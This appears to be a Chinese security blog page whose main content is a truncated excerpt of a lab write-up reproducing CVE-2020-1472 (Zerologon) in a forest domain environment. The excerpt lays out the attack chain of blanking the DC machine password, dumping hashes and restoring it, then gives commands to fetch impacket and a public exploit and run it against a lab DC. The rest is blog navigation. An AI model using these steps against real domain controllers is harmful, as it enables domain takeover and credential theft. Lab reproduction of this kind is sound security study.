avatar
文章
68
标签
37
分类
23
主页
文章
标签
分类
链接
关于我
联系方式

漏洞复现

林级域环境下复现CVE-2020-1472
林级域环境下复现CVE-2020-1472
发表于|漏洞复现
环境 域林环境 根DC:10.100.100.100(server2019) 一级林DC:10.100.100.101(server2016) 二级林DC:10.100.100.102(server2012R2) 跳板机(攻击机):10.100.100.105(WIN10) 简要拓扑 过程 利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码 攻击首先安装impacket: git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install 然后下载利用脚本 git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472 直接拿根域测,执行 python cve-2020-1472-exploit.py AD 10.100.100.100 ...
avatar
Sp4ce
不傲不畏,不卑不亢,不骄不躁,不气不馁,不争不抢。
文章
68
标签
37
分类
23
Follow Me
公告
感谢访问,喜欢请多收藏 ^_^
最新文章
内存取证工具Volatility使用
内存取证工具Volatility使用
PHP ioncube V10.X解密
PHP ioncube V10.X解密
林级域环境下复现CVE-2020-1472
林级域环境下复现CVE-2020-1472
审计通达OA时的一些记录
审计通达OA时的一些记录
通达OA 2013-2019(V11.X)前台多处注入点
通达OA 2013-2019(V11.X)前台多处注入点
分类
标签
AWD AWVS11 Algorithm C CS CTF CodeReview Crack Docker Hexo Java LAMP Linux PHP Pentest Python Router SQLi VMWare VulCMS VulRepro Windows Server WriteUp XSS centos codeReview mysql 代码审计 内网渗透 域渗透 威胁情报 工具 应急响应 日常 汉化 漏洞复现 面试
归档
网站资讯
文章数目 :
68
已运行时间 :
本站总字数 :
65.7k
本站访客数 :
本站总访问量 :
最后更新时间 :